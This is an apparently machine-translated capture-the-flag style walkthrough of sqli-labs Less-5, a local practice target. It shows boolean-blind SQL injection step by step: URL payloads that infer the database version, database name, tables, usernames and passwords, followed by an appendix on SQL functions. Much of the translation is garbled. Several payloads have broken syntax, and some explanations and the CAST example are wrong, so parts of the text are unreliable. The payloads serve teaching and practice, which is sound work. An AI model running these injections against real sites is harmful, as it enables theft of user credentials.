Sqli-labs-master Fifth Less-5 Double Query-single: Way One

Since the 34th and the first and second close are roughly the same, I will not write.

Next comes the first way to write the fifth level.

1 , target site:

Http://127.0.0.1/sqli-labs-master/Less-5/?id=1

When passing the ID of 1, the Prompt "You is in"

2 , find the injection point:   

Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' return error

When the above URL is entered, an error is made. We can see the cause of the error from the arrows.

instructions to " 1 ' "brought into the database query, so Presence Injection Point

3 to view version information:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (version (), 1) =5%23

Return to normal

http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (version (), 1) =4%23

return error So the database version is 5.0

4 to determine the length of the database:

Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Length (database ()) = 7%23

return error

Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Length (database ()) = 8%23

Return the correct

Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Length (database ()) = 9%23

return error

so the name of the database is 8 bit composition

5 , guess the database name ( start with the first guess . ):

1> Guess first 1 bit

Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 1) > ' A '%23

Return to normal

Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 1) > ' Z '%23

return error

indicates that the first person a and the Z between

Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 1) > ' s '%23

Return the correct

so the first place is s

1> Guess first 2 bit

http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 2) > ' SA '%23

Return to normal

http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 2) > ' sz '%23

return error

and between

http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 2) > ' SE '%23

Return the correct

so the second place is e

and so on until the introduction of the first 8 bits: The last database is Security

6 , guess the database ( Security ) in the table:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and ASCII (SUBSTR ((SELECT table_name from Information_ schema.tables WHERE Table_schema = Database () limit A,1)b, 1)) >n

Description

ais from0begin the first few tables,bis for the first few characters,Nis aASCIIThe corresponding decimal number

7 , guess the user:

http://127.0.0.1/sqli-labs-master/ Less-5/?id=1 ' and Ord (Mid ( Select Ifnull (CAST (username as char), 0x20) from s. M A ,1), ,1) = %23

whichSis the database name;Mis the name of the table;Afor the first few users;Bfor the first few characters;Nto beASCIIdecimal number corresponding to the code.

8. guess the user and password:

http://127.0.0.1/sqli-labs-master/ Less-5/?id=1 '   and Ord (Mid ((select Ifnull (CAST (username as char), 0x20) from S.M order by ID limit a ,1 ", b n %23  

which S is the database name;M is the table name;A is the number of users;B is the first character; N is the decimal number corresponding to the ASCII code.

Example: http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Ord (Mid ((select Ifnull (CAST (password as char), 0x20) from Security.users order by ID limit 0,1) =68%23

Appendix:

substr () for string addition and subtraction

Ord () Converts the ASCLL code value to the Word Descriptor Example: Ord (' a ') denotes the ordinal number of a in ASSCLL code, which is 97; Ord (' B ') denotes B in the ASSCLL code of the ordinal number, is 98;

Mid (): string intercept function

Syntax: Mid (string, specifies the number of intercept bits, intercept N)

Example

B6=123456789abcdef =mid (b6,1,13) result = 123456789ABCD

Ifnull (EXPR1,EXPR2)

If EXPR1 is not Null,ifnull () returns EXPR1, it returns EXPR2.

Cast () function:

Reference Blog: http://www.studyofnet.com/news/109.html

(1). The argument to the CAST () function is an expression that includes the source value and the target data type separated by the AS keyword. The following example is used to convert the text string ' 12 ' to an integral type:

SELECT CAST (' + ' as int)

(2). The return value is an integer value of 12. What happens if you try to convert a string that represents a decimal to an integer value?

SELECT CAST (' 12.5 ' as int)

(3). Neither the CAST () function nor the CONVERT () function can perform rounding or truncation operations. Since 12.5 cannot be represented by an int data type, a call to this function will produce an error:

Public number

Sqli-labs-master Fifth Less-5 Double Query-single: Way One